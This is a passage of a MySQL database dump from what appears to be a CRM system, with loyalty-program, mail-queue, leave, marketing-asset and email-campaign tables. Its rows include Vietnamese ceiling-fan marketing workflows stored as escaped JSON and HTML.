) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci;

--
-- Dumping data for table `tblloy_mbs_rule`
--

INSERT INTO `tblloy_mbs_rule` (`id`, `name`, `add_from`, `date_create`, `client_group`, `client`, `loyalty_point_from`, `loyalty_point_to`, `card`, `description`) VALUES
(1, 'Sliver', 1, '2022-10-13', 0, '', 1, 50, 1, ''),
(2, 'Gold', 1, '2022-10-13', 0, '', 51, 100, 1, ''),
(3, 'Titan', 1, '2022-10-13', 0, '', 101, 200, 1, ''),
(4, 'Premium', 1, '2022-10-13', 0, '', 201, 500, 1, '');

-- --------------------------------------------------------

--
-- Table structure for table `tblloy_program_detail`
--

CREATE TABLE `tblloy_program_detail` (
  `id` int(11) NOT NULL,
  `mbs_program` int(11) NOT NULL,
  `rel_type` varchar(30) NOT NULL,
  `rel_id` text NOT NULL,
  `percent` int(11) DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblloy_program_discount_log`
--

CREATE TABLE `tblloy_program_discount_log` (
  `id` int(11) NOT NULL,
  `client` int(11) NOT NULL,
  `mbs_program` int(11) DEFAULT NULL,
  `invoice` int(11) DEFAULT NULL,
  `time` datetime DEFAULT NULL,
  `value` decimal(15,2) DEFAULT NULL,
  `note` text DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblloy_redeem_log`
--

CREATE TABLE `tblloy_redeem_log` (
  `id` int(11) NOT NULL,
  `client` int(11) NOT NULL,
  `cart` int(11) DEFAULT NULL,
  `invoice` int(11) DEFAULT NULL,
  `time` datetime DEFAULT NULL,
  `old_point` decimal(10,0) DEFAULT NULL,
  `new_point` decimal(10,0) DEFAULT NULL,
  `redeep_from` decimal(10,0) DEFAULT NULL,
  `redeep_to` decimal(15,2) DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblloy_redemp_detail`
--

CREATE TABLE `tblloy_redemp_detail` (
  `id` int(11) NOT NULL,
  `loy_rule` int(11) NOT NULL,
  `rule_name` varchar(200) NOT NULL,
  `point_from` decimal(15,0) DEFAULT NULL,
  `point_to` decimal(15,0) DEFAULT NULL,
  `point_weight` decimal(15,2) DEFAULT NULL,
  `status` varchar(20) DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblloy_rule`
--

CREATE TABLE `tblloy_rule` (
  `id` int(11) NOT NULL,
  `subject` varchar(200) NOT NULL,
  `add_from` int(11) NOT NULL,
  `date_create` date DEFAULT NULL,
  `enable` int(11) DEFAULT 0,
  `redeemp_type` varchar(15) DEFAULT NULL,
  `min_poin_to_redeem` decimal(15,0) DEFAULT NULL,
  `start_date` date DEFAULT NULL,
  `end_date` date DEFAULT NULL,
  `rule_base` varchar(30) DEFAULT NULL,
  `minium_purchase` decimal(15,0) DEFAULT NULL,
  `poin_awarded` decimal(15,0) DEFAULT NULL,
  `purchase_value` decimal(15,0) DEFAULT NULL,
  `note` text DEFAULT NULL,
  `redeem_portal` int(11) DEFAULT 0,
  `redeem_pos` int(11) DEFAULT 0,
  `client_group` int(11) DEFAULT 0,
  `client` text NOT NULL,
  `max_amount_received` int(11) NOT NULL,
  `create_account_point` int(11) DEFAULT NULL,
  `birthday_point` int(11) DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblloy_rule_detail`
--

CREATE TABLE `tblloy_rule_detail` (
  `id` int(11) NOT NULL,
  `loy_rule` int(11) NOT NULL,
  `rel_type` varchar(30) NOT NULL,
  `rel_id` text NOT NULL,
  `loyalty_point` decimal(15,0) DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblloy_transation`
--

CREATE TABLE `tblloy_transation` (
  `id` int(11) NOT NULL,
  `reference` varchar(30) NOT NULL,
  `invoice` int(11) DEFAULT NULL,
  `client` int(11) NOT NULL,
  `add_from` int(11) DEFAULT NULL,
  `date_create` datetime DEFAULT NULL,
  `loyalty_point` decimal(15,0) DEFAULT NULL,
  `type` varchar(30) DEFAULT NULL,
  `note` text DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblloy_voucher_inv_log`
--

CREATE TABLE `tblloy_voucher_inv_log` (
  `id` int(11) NOT NULL,
  `client` int(11) NOT NULL,
  `voucher_code` text DEFAULT NULL,
  `invoice` int(11) DEFAULT NULL,
  `time` datetime DEFAULT NULL,
  `value` decimal(15,2) DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblmaillistscustomfields`
--

CREATE TABLE `tblmaillistscustomfields` (
  `customfieldid` int(11) NOT NULL,
  `listid` int(11) NOT NULL,
  `fieldname` varchar(150) NOT NULL,
  `fieldslug` varchar(100) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblmaillistscustomfieldvalues`
--

CREATE TABLE `tblmaillistscustomfieldvalues` (
  `customfieldvalueid` int(11) NOT NULL,
  `listid` int(11) NOT NULL,
  `customfieldid` int(11) NOT NULL,
  `emailid` int(11) NOT NULL,
  `value` varchar(100) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblmail_queue`
--

CREATE TABLE `tblmail_queue` (
  `id` int(11) NOT NULL,
  `engine` varchar(40) DEFAULT NULL,
  `email` varchar(191) NOT NULL,
  `cc` text DEFAULT NULL,
  `bcc` text DEFAULT NULL,
  `message` mediumtext NOT NULL,
  `alt_message` mediumtext DEFAULT NULL,
  `status` enum('pending','sending','sent','failed') DEFAULT NULL,
  `date` datetime DEFAULT NULL,
  `headers` text DEFAULT NULL,
  `attachments` mediumtext DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblmanage_leave`
--

CREATE TABLE `tblmanage_leave` (
  `leave_id` int(10) UNSIGNED NOT NULL,
  `id_staff` int(11) NOT NULL,
  `leave_date` int(11) DEFAULT NULL,
  `leave_year` int(11) DEFAULT NULL,
  `accumulated_leave` int(11) DEFAULT NULL,
  `seniority_leave` int(11) DEFAULT NULL,
  `borrow_leave` int(11) DEFAULT NULL,
  `actual_leave` int(11) DEFAULT NULL,
  `expected_leave` int(11) DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblma_assets`
--

CREATE TABLE `tblma_assets` (
  `id` int(11) NOT NULL,
  `name` text NOT NULL,
  `language` varchar(40) DEFAULT NULL,
  `category` int(11) NOT NULL DEFAULT 0,
  `published` int(11) NOT NULL DEFAULT 1,
  `description` text DEFAULT NULL,
  `addedfrom` int(11) DEFAULT NULL,
  `dateadded` datetime NOT NULL,
  `color` text DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

--
-- Dumping data for table `tblma_assets`
--

INSERT INTO `tblma_assets` (`id`, `name`, `language`, `category`, `published`, `description`, `addedfrom`, `dateadded`, `color`) VALUES
(2, 'Haiku - Brochure', NULL, 7, 1, '', 1, '2023-02-23 11:03:46', '#65b609'),
(3, 'WIT - Catalogue 2022', NULL, 7, 1, '', 1, '2023-02-25 07:59:48', '');

-- --------------------------------------------------------

--
-- Table structure for table `tblma_asset_download_logs`
--

CREATE TABLE `tblma_asset_download_logs` (
  `id` int(11) NOT NULL,
  `asset_id` int(11) NOT NULL,
  `ip` text DEFAULT NULL,
  `browser_name` text DEFAULT NULL,
  `http_user_agent` text DEFAULT NULL,
  `time` datetime NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

--
-- Dumping data for table `tblma_asset_download_logs`
--

INSERT INTO `tblma_asset_download_logs` (`id`, `asset_id`, `ip`, `browser_name`, `http_user_agent`, `time`) VALUES
(1, 2, '115.77.188.167', 'Google Chrome', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36', '2023-02-23 11:03:53'),
(3, 2, '113.161.35.100', 'Mozilla Firefox', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0', '2024-01-23 15:50:59');

-- --------------------------------------------------------

--
-- Table structure for table `tblma_campaigns`
--

CREATE TABLE `tblma_campaigns` (
  `id` int(11) NOT NULL,
  `name` text NOT NULL,
  `color` text DEFAULT NULL,
  `category` int(11) NOT NULL DEFAULT 0,
  `published` int(11) NOT NULL DEFAULT 1,
  `start_date` date DEFAULT NULL,
  `end_date` date DEFAULT NULL,
  `workflow` longtext DEFAULT NULL,
  `description` text DEFAULT NULL,
  `addedfrom` int(11) DEFAULT NULL,
  `dateadded` datetime NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

--
-- Dumping data for table `tblma_campaigns`
--

INSERT INTO `tblma_campaigns` (`id`, `name`, `color`, `category`, `published`, `start_date`, `end_date`, `workflow`, `description`, `addedfrom`, `dateadded`) VALUES
(1, 'Tiếp thị Email Marketing', '#09b6f6', 5, 1, '0000-00-00', '0000-00-00', '\"{\\\"drawflow\\\":{\\\"Home\\\":{\\\"data\\\":{\\\"31\\\":{\\\"id\\\":31,\\\"name\\\":\\\"flow_start\\\",\\\"data\\\":{\\\"lead_data_from\\\":\\\"segment\\\",\\\"form\\\":\\\"1\\\",\\\"segment\\\":\\\"1\\\"},\\\"class\\\":\\\"flow_start\\\",\\\"html\\\":\\\"<div class=\\\\\\\"panel-group no-margin\\\\\\\">\\\\r\\\\n  <div class=\\\\\\\"panel panel-default\\\\\\\">\\\\r\\\\n    <div class=\\\\\\\"panel-heading\\\\\\\">\\\\r\\\\n      <h4 class=\\\\\\\"panel-title\\\\\\\" data-toggle=\\\\\\\"collapse\\\\\\\" data-target=\\\\\\\"#collapse_node_31\\\\\\\" aria-expanded=\\\\\\\"true\\\\\\\">\\\\r\\\\n        <span class=\\\\\\\"text-success glyphicon glyphicon-log-in\\\\\\\"> <\\/span><span class=\\\\\\\"text-success\\\\\\\"> Flow start<\\/span>\\\\r\\\\n      <\\/h4>\\\\r\\\\n    <\\/div>\\\\r\\\\n    <div id=\\\\\\\"collapse_node_31\\\\\\\" class=\\\\\\\"panel-collapse collapse in\\\\\\\" aria-expanded=\\\\\\\"true\\\\\\\">\\\\r\\\\n      <div class=\\\\\\\"box\\\\\\\" node-id=\\\\\\\"31\\\\\\\">\\\\r\\\\n          <div class=\\\\\\\"form-group\\\\\\\">\\\\r\\\\n            <label for=\\\\\\\"lead_data_from\\\\\\\">Lead data from<\\/label><br \\/>\\\\r\\\\n            <div class=\\\\\\\"radio radio-inline radio-primary\\\\\\\">\\\\r\\\\n              <input type=\\\\\\\"radio\\\\\\\" name=\\\\\\\"lead_data_from[31]\\\\\\\" id=\\\\\\\"lead_data_from_segment[31]\\\\\\\" value=\\\\\\\"segment\\\\\\\" checked df-lead_data_from>\\\\r\\\\n              <label for=\\\\\\\"lead_data_from_segment[31]\\\\\\\">Segment<\\/label>\\\\r\\\\n            <\\/div>\\\\r\\\\n            <div class=\\\\\\\"radio radio-inline radio-primary\\\\\\\">\\\\r\\\\n              <input type=\\\\\\\"radio\\\\\\\" name=\\\\\\\"lead_data_from[31]\\\\\\\" id=\\\\\\\"lead_data_from_form[31]\\\\\\\" value=\\\\\\\"form\\\\\\\" df-lead_data_from>\\\\r\\\\n              <label for=\\\\\\\"lead_data_from_form[31]\\\\\\\">Form<\\/label>\\\\r\\\\n            <\\/div>\\\\r\\\\n          <\\/div>\\\\r\\\\n          <div class=\\\\\\\"div_lead_data_from_segment\\\\\\\">\\\\r\\\\n            <div class=\\\\\\\"select-placeholder form-group\\\\\\\" app-field-wrapper=\\\\\\\"segment[31]\\\\\\\"><label for=\\\\\\\"segment[31]\\\\\\\" class=\\\\\\\"control-label\\\\\\\">Segment<\\/label><select id=\\\\\\\"segment[31]\\\\\\\" name=\\\\\\\"segment[31]\\\\\\\" class=\\\\\\\"selectpicker\\\\\\\" df-segment=\\\\\\\"\\\\\\\" data-width=\\\\\\\"100%\\\\\\\" data-none-selected-text=\\\\\\\"Nothing selected\\\\\\\" data-live-search=\\\\\\\"true\\\\\\\"><option value=\\\\\\\"\\\\\\\"><\\/option><option value=\\\\\\\"1\\\\\\\">20Sep_Email_Marketing<\\/option><\\/select><\\/div>          <\\/div>\\\\r\\\\n          <div class=\\\\\\\"div_lead_data_from_form hide\\\\\\\">\\\\r\\\\n            <div class=\\\\\\\"select-placeholder form-group\\\\\\\" app-field-wrapper=\\\\\\\"form[31]\\\\\\\"><label for=\\\\\\\"form[31]\\\\\\\" class=\\\\\\\"control-label\\\\\\\">Form<\\/label><select id=\\\\\\\"form[31]\\\\\\\" name=\\\\\\\"form[31]\\\\\\\" class=\\\\\\\"selectpicker\\\\\\\" df-form=\\\\\\\"\\\\\\\" data-width=\\\\\\\"100%\\\\\\\" data-none-selected-text=\\\\\\\"Nothing selected\\\\\\\" data-live-search=\\\\\\\"true\\\\\\\"><option value=\\\\\\\"\\\\\\\"><\\/option><option value=\\\\\\\"1\\\\\\\">Collect list Contact<\\/option><\\/select><\\/div>          <\\/div>\\\\r\\\\n        <\\/div>\\\\r\\\\n    <\\/div>\\\\r\\\\n  <\\/div>\\\\r\\\\n<\\/div>\\\\r\\\\n\\\",\\\"typenode\\\":false,\\\"inputs\\\":{},\\\"outputs\\\":{\\\"output_1\\\":{\\\"connections\\\":[{\\\"node\\\":\\\"32\\\",\\\"output\\\":\\\"input_1\\\"}]}},\\\"pos_x\\\":260,\\\"pos_y\\\":271},\\\"32\\\":{\\\"id\\\":32,\\\"name\\\":\\\"email\\\",\\\"data\\\":{\\\"email\\\":\\\"5\\\",\\\"complete_action\\\":\\\"after\\\"},\\\"class\\\":\\\"email\\\",\\\"html\\\":\\\"<div class=\\\\\\\"panel-group no-margin\\\\\\\">\\\\r\\\\n  <div class=\\\\\\\"panel panel-default\\\\\\\">\\\\r\\\\n    <div class=\\\\\\\"panel-heading\\\\\\\">\\\\r\\\\n      <h4 class=\\\\\\\"panel-title\\\\\\\" data-toggle=\\\\\\\"collapse\\\\\\\" data-target=\\\\\\\"#collapse_node_32\\\\\\\" aria-expanded=\\\\\\\"true\\\\\\\">\\\\r\\\\n        <span class=\\\\\\\"text-primary glyphicon glyphicon-envelope\\\\\\\"> <\\/span><span class=\\\\\\\"text-primary\\\\\\\"> Email<\\/span>\\\\r\\\\n      <\\/h4>\\\\r\\\\n    <\\/div>\\\\r\\\\n    <div id=\\\\\\\"collapse_node_32\\\\\\\" class=\\\\\\\"panel-collapse collapse in\\\\\\\" aria-expanded=\\\\\\\"true\\\\\\\">\\\\r\\\\n\\\\r\\\\n      <div class=\\\\\\\"box\\\\\\\" node-id=\\\\\\\"32\\\\\\\">\\\\r\\\\n        <div class=\\\\\\\"form-group\\\\\\\">\\\\r\\\\n          <label for=\\\\\\\"complete_action\\\\\\\">Complete action:<\\/label><br \\/>\\\\r\\\\n          <div class=\\\\\\\"radio radio-primary\\\\\\\">\\\\r\\\\n            <input type=\\\\\\\"radio\\\\\\\" name=\\\\\\\"complete_action[32]\\\\\\\" id=\\\\\\\"complete_action_right_away[32]\\\\\\\" value=\\\\\\\"right_away\\\\\\\" checked df-complete_action>\\\\r\\\\n            <label for=\\\\\\\"complete_action_right_away[32]\\\\\\\">Right away<\\/label>\\\\r\\\\n          <\\/div>\\\\r\\\\n          <div class=\\\\\\\"radio radio-primary\\\\\\\">\\\\r\\\\n            <input type=\\\\\\\"radio\\\\\\\" name=\\\\\\\"complete_action[32]\\\\\\\" id=\\\\\\\"complete_action_after[32]\\\\\\\" value=\\\\\\\"after\\\\\\\" df-complete_action>\\\\r\\\\n            <label for=\\\\\\\"complete_action_after[32]\\\\\\\">After<\\/label>\\\\r\\\\n          <\\/div>\\\\r\\\\n          <div class=\\\\\\\"radio radio-primary\\\\\\\">\\\\r\\\\n            <input type=\\\\\\\"radio\\\\\\\" name=\\\\\\\"complete_action[32]\\\\\\\" id=\\\\\\\"complete_action_exact_time[32]\\\\\\\" value=\\\\\\\"exact_time\\\\\\\" df-complete_action>\\\\r\\\\n            <label for=\\\\\\\"complete_action_exact_time[32]\\\\\\\">Exact time<\\/label>\\\\r\\\\n          <\\/div>\\\\r\\\\n          <div class=\\\\\\\"radio radio-primary\\\\\\\">\\\\r\\\\n            <input type=\\\\\\\"radio\\\\\\\" name=\\\\\\\"complete_action[32]\\\\\\\" id=\\\\\\\"complete_action_exact_time_and_date[32]\\\\\\\" value=\\\\\\\"exact_time_and_date\\\\\\\" df-complete_action>\\\\r\\\\n            <label for=\\\\\\\"complete_action_exact_time_and_date[32]\\\\\\\">Exact time and date<\\/label>\\\\r\\\\n          <\\/div>\\\\r\\\\n        <\\/div>\\\\r\\\\n\\\\r\\\\n        <div class=\\\\\\\"div_complete_action_after hide\\\\\\\">\\\\r\\\\n                        <div class=\\\\\\\"row\\\\\\\">\\\\r\\\\n              <div class=\\\\\\\"col-md-6 no-padding-right\\\\\\\">\\\\r\\\\n                <div class=\\\\\\\"form-group\\\\\\\" app-field-wrapper=\\\\\\\"waiting_number[32]\\\\\\\"><input type=\\\\\\\"number\\\\\\\" id=\\\\\\\"waiting_number[32]\\\\\\\" name=\\\\\\\"waiting_number[32]\\\\\\\" class=\\\\\\\"form-control\\\\\\\" df-waiting_number=\\\\\\\"\\\\\\\" value=\\\\\\\"1\\\\\\\"><\\/div>              <\\/div>\\\\r\\\\n              <div class=\\\\\\\"col-md-6\\\\\\\">\\\\r\\\\n                <div class=\\\\\\\"select-placeholder form-group\\\\\\\" app-field-wrapper=\\\\\\\"waiting_type[32]\\\\\\\"><select id=\\\\\\\"waiting_type[32]\\\\\\\" name=\\\\\\\"waiting_type[32]\\\\\\\" class=\\\\\\\"selectpicker\\\\\\\" df-waiting_type=\\\\\\\"\\\\\\\" data-width=\\\\\\\"100%\\\\\\\" data-none-selected-text=\\\\\\\"Nothing selected\\\\\\\" data-live-search=\\\\\\\"true\\\\\\\"><option value=\\\\\\\"minutes\\\\\\\">Min<\\/option><option value=\\\\\\\"hour\\\\\\\">Hours<\\/option><option value=\\\\\\\"day\\\\\\\">Days<\\/option><\\/select><\\/div>              <\\/div>\\\\r\\\\n            <\\/div>\\\\r\\\\n        <\\/div>\\\\r\\\\n        <div class=\\\\\\\"div_complete_action_exact_time hide\\\\\\\">\\\\r\\\\n        <div class=\\\\\\\"form-group\\\\\\\" app-field-wrapper=\\\\\\\"exact_time[32]\\\\\\\"><label for=\\\\\\\"exact_time[32]\\\\\\\" class=\\\\\\\"control-label\\\\\\\">Exact time<\\/label><input type=\\\\\\\"time\\\\\\\" id=\\\\\\\"exact_time[32]\\\\\\\" name=\\\\\\\"exact_time[32]\\\\\\\" class=\\\\\\\"form-control\\\\\\\" df-exact_time=\\\\\\\"\\\\\\\" value=\\\\\\\"\\\\\\\"><\\/div>        <\\/div>\\\\r\\\\n        <div class=\\\\\\\"div_complete_action_exact_time_and_date hide\\\\\\\">\\\\r\\\\n        <div class=\\\\\\\"form-group\\\\\\\" app-field-wrapper=\\\\\\\"exact_time_and_date[32]\\\\\\\"><label for=\\\\\\\"exact_time_and_date[32]\\\\\\\" class=\\\\\\\"control-label\\\\\\\">Exact time and date<\\/label><div class=\\\\\\\"input-group date\\\\\\\"><input type=\\\\\\\"text\\\\\\\" id=\\\\\\\"exact_time_and_date[32]\\\\\\\" name=\\\\\\\"exact_time_and_date[32]\\\\\\\" class=\\\\\\\"form-control datetimepicker\\\\\\\" df-exact_time_and_date=\\\\\\\"\\\\\\\" value=\\\\\\\"\\\\\\\" autocomplete=\\\\\\\"off\\\\\\\"><div class=\\\\\\\"input-group-addon\\\\\\\">\\\\n    <i class=\\\\\\\"fa fa-calendar calendar-icon\\\\\\\"><\\/i>\\\\n<\\/div><\\/div><\\/div>          \\\\r\\\\n        <\\/div>\\\\r\\\\n        <hr>\\\\r\\\\n        <div class=\\\\\\\"select-placeholder form-group\\\\\\\" app-field-wrapper=\\\\\\\"email[32]\\\\\\\"><label for=\\\\\\\"email[32]\\\\\\\" class=\\\\\\\"control-label\\\\\\\">Emails<\\/label><select id=\\\\\\\"email[32]\\\\\\\" name=\\\\\\\"email[32]\\\\\\\" class=\\\\\\\"selectpicker\\\\\\\" df-email=\\\\\\\"\\\\\\\" data-width=\\\\\\\"100%\\\\\\\" data-none-selected-text=\\\\\\\"Nothing selected\\\\\\\" data-live-search=\\\\\\\"true\\\\\\\"><option value=\\\\\\\"\\\\\\\"><\\/option><option value=\\\\\\\"2\\\\\\\">email d\\u00e0nh cho t\\u01b0 v\\u1ea5n thi\\u1ebft k\\u1ebf<\\/option><option value=\\\\\\\"1\\\\\\\">Haiku - qu\\u1ea1t tr\\u1ea7n th\\u00f4ng minh nh\\u1ea5t th\\u1ebf gi\\u1edbi<\\/option><option value=\\\\\\\"6\\\\\\\">Haiku - qu\\u1ea1t tr\\u1ea7n th\\u00f4ng minh \\u0111\\u1ea7u ti\\u00ean tr\\u00ean th\\u1ebf gi\\u1edbi (VN)<\\/option><option value=\\\\\\\"4\\\\\\\">Tổ chức đào tạo WIT<\\/option><option value=\\\\\\\"12\\\\\\\">Haiku L mang \\u0111\\u1ebfn s\\u1ef1 tho\\u1ea3i m\\u00e1i ho\\u00e0n h\\u1ea3o<\\/option><option value=\\\\\\\"13\\\\\\\">Tổ chức đào tạo WIT - THANK YOU TO CUSTOMER VISIT VMIF 2023 EXHIBITION IN BINH DUONG<\\/option><option value=\\\\\\\"3\\\\\\\">NCC THI\\u1ebeT K\\u1ebe T\\u01af V\\u1ea4N GI\\u1ea2I PH\\u00c1P QU\\u1ea0T L\\u00c0M M\\u00c1T<\\/option><option value=\\\\\\\"8\\\\\\\">New - Qu\\u1ea1t tr\\u1ea7n Haiku - gi\\u1ea3i ph\\u00e1p l\\u00e0m m\\u00e1t cho kh\\u00f4ng gian nh\\u00e0 \\u1edf c\\u1ee7a b\\u1ea1n<\\/option><option value=\\\\\\\"9\\\\\\\">Qu\\u1ea1t tr\\u1ea7n Tổ chức đào tạo WIT - gi\\u1ea3i ph\\u00e1p l\\u00e0m m\\u00e1t cho kh\\u00f4ng gian nh\\u00e0 \\u1edf c\\u1ee7a b\\u1ea1n<\\/option><option value=\\\\\\\"5\\\\\\\">Qu\\u1ea1t Tr\\u1ea7n SUNON - Gi\\u1ea3i ph\\u00e1p l\\u00e0m m\\u00e1t to\\u00e0n di\\u1ec7n kh\\u00f4ng gian r\\u1ed9ng\\/l\\u1edbn<\\/option><option value=\\\\\\\"10\\\\\\\">Sunon - Powerful HVLS Fan series 1<\\/option><option value=\\\\\\\"11\\\\\\\">Sunon - Powerful HVLS Fan series 3<\\/option><option value=\\\\\\\"7\\\\\\\">[Tổ chức đào tạo WIT] - Cung c\\u1ea5p gi\\u1ea3i ph\\u00e1p to\\u00e0n di\\u1ec7n qu\\u1ea1t l\\u00e0m m\\u00e1t cho kh\\u00f4ng gian nh\\u00e0 \\u1edf\\/V\\u0103n Ph\\u00f2ng & Nh\\u00e0 X\\u01b0\\u1edfng<\\/option><\\/select><\\/div>\\\\r\\\\n      <\\/div>\\\\r\\\\n    <\\/div>\\\\r\\\\n  <\\/div>\\\\r\\\\n<\\/div>\\\",\\\"typenode\\\":false,\\\"inputs\\\":{\\\"input_1\\\":{\\\"connections\\\":[{\\\"node\\\":\\\"31\\\",\\\"input\\\":\\\"output_1\\\"}]}},\\\"outputs\\\":{\\\"output_1\\\":{\\\"connections\\\":[]}},\\\"pos_x\\\":681,\\\"pos_y\\\":298}}}}}\"', '<p>G&#7903;i email gi&#7899;i thi&#7879;u &#273;&#7871;n c&#225;c nh&#224; th&#7847;u - t&#7915; HGP</p>', 1, '2022-11-17 13:50:51'),
(2, 'Hamilton-Air', '', 5, 1, '0000-00-00', '0000-00-00', '\"{\\\"drawflow\\\":{\\\"Home\\\":{\\\"data\\\":{\\\"1\\\":{\\\"id\\\":1,\\\"name\\\":\\\"flow_start\\\",\\\"data\\\":{\\\"lead_data_from\\\":\\\"segment\\\",\\\"form\\\":\\\"1\\\",\\\"segment\\\":\\\"3\\\"},\\\"class\\\":\\\"flow_start\\\",\\\"html\\\":\\\"<div class=\\\\\\\"panel-group no-margin\\\\\\\">\\\\r\\\\n  <div class=\\\\\\\"panel panel-default\\\\\\\">\\\\r\\\\n    <div class=\\\\\\\"panel-heading\\\\\\\">\\\\r\\\\n      <h4 class=\\\\\\\"panel-title\\\\\\\" data-toggle=\\\\\\\"collapse\\\\\\\" data-target=\\\\\\\"#collapse_node_1\\\\\\\" aria-expanded=\\\\\\\"true\\\\\\\">\\\\r\\\\n        <span class=\\\\\\\"text-success glyphicon glyphicon-log-in\\\\\\\"> <\\/span><span class=\\\\\\\"text-success\\\\\\\"> Flow start<\\/span>\\\\r\\\\n      <\\/h4>\\\\r\\\\n    <\\/div>\\\\r\\\\n    <div id=\\\\\\\"collapse_node_1\\\\\\\" class=\\\\\\\"panel-collapse collapse in\\\\\\\" aria-expanded=\\\\\\\"true\\\\\\\">\\\\r\\\\n      <div class=\\\\\\\"box\\\\\\\" node-id=\\\\\\\"1\\\\\\\">\\\\r\\\\n          <div class=\\\\\\\"form-group\\\\\\\">\\\\r\\\\n            <label for=\\\\\\\"lead_data_from\\\\\\\">Lead data from<\\/label><br \\/>\\\\r\\\\n            <div class=\\\\\\\"radio radio-inline radio-primary\\\\\\\">\\\\r\\\\n              <input type=\\\\\\\"radio\\\\\\\" name=\\\\\\\"lead_data_from[1]\\\\\\\" id=\\\\\\\"lead_data_from_segment[1]\\\\\\\" value=\\\\\\\"segment\\\\\\\" checked df-lead_data_from>\\\\r\\\\n              <label for=\\\\\\\"lead_data_from_segment[1]\\\\\\\">Segment<\\/label>\\\\r\\\\n            <\\/div>\\\\r\\\\n            <div class=\\\\\\\"radio radio-inline radio-primary\\\\\\\">\\\\r\\\\n              <input type=\\\\\\\"radio\\\\\\\" name=\\\\\\\"lead_data_from[1]\\\\\\\" id=\\\\\\\"lead_data_from_form[1]\\\\\\\" value=\\\\\\\"form\\\\\\\" df-lead_data_from>\\\\r\\\\n              <label for=\\\\\\\"lead_data_from_form[1]\\\\\\\">Form<\\/label>\\\\r\\\\n            <\\/div>\\\\r\\\\n          <\\/div>\\\\r\\\\n          <div class=\\\\\\\"div_lead_data_from_segment\\\\\\\">\\\\r\\\\n            <div class=\\\\\\\"select-placeholder form-group\\\\\\\" app-field-wrapper=\\\\\\\"segment[1]\\\\\\\"><label for=\\\\\\\"segment[1]\\\\\\\" class=\\\\\\\"control-label\\\\\\\">Segment<\\/label><select id=\\\\\\\"segment[1]\\\\\\\" name=\\\\\\\"segment[1]\\\\\\\" class=\\\\\\\"selectpicker\\\\\\\" df-segment=\\\\\\\"\\\\\\\" data-width=\\\\\\\"100%\\\\\\\" data-none-selected-text=\\\\\\\"Nothing selected\\\\\\\" data-live-search=\\\\\\\"true\\\\\\\"><option value=\\\\\\\"\\\\\\\"><\\/option><option value=\\\\\\\"1\\\\\\\">20Sep_Email_Marketing<\\/option><option value=\\\\\\\"3\\\\\\\">HamiltonAir_Segment<\\/option><\\/select><\\/div>          <\\/div>\\\\r\\\\n          <div class=\\\\\\\"div_lead_data_from_form hide\\\\\\\">\\\\r\\\\n            <div class=\\\\\\\"select-placeholder form-group\\\\\\\" app-field-wrapper=\\\\\\\"form[1]\\\\\\\"><label for=\\\\\\\"form[1]\\\\\\\" class=\\\\\\\"control-label\\\\\\\">Form<\\/label><select id=\\\\\\\"form[1]\\\\\\\" name=\\\\\\\"form[1]\\\\\\\" class=\\\\\\\"selectpicker\\\\\\\" df-form=\\\\\\\"\\\\\\\" data-width=\\\\\\\"100%\\\\\\\" data-none-selected-text=\\\\\\\"Nothing selected\\\\\\\" data-live-search=\\\\\\\"true\\\\\\\"><option value=\\\\\\\"\\\\\\\"><\\/option><option value=\\\\\\\"1\\\\\\\">Form_HamiltonAir<\\/option><\\/select><\\/div>          <\\/div>\\\\r\\\\n        <\\/div>\\\\r\\\\n    <\\/div>\\\\r\\\\n  <\\/div>\\\\r\\\\n<\\/div>\\\\r\\\\n\\\",\\\"typenode\\\":false,\\\"inputs\\\":{},\\\"outputs\\\":{\\\"output_1\\\":{\\\"connections\\\":[{\\\"node\\\":\\\"2\\\",\\\"output\\\":\\\"input_1\\\"}]}},\\\"pos_x\\\":293.83331298828125,\\\"pos_y\\\":136},\\\"2\\\":{\\\"id\\\":2,\\\"name\\\":\\\"email\\\",\\\"data\\\":{\\\"email\\\":\\\"6\\\"},\\\"class\\\":\\\"email\\\",\\\"html\\\":\\\"<div class=\\\\\\\"panel-group no-margin\\\\\\\">\\\\r\\\\n  <div class=\\\\\\\"panel panel-default\\\\\\\">\\\\r\\\\n    <div class=\\\\\\\"panel-heading\\\\\\\">\\\\r\\\\n      <h4 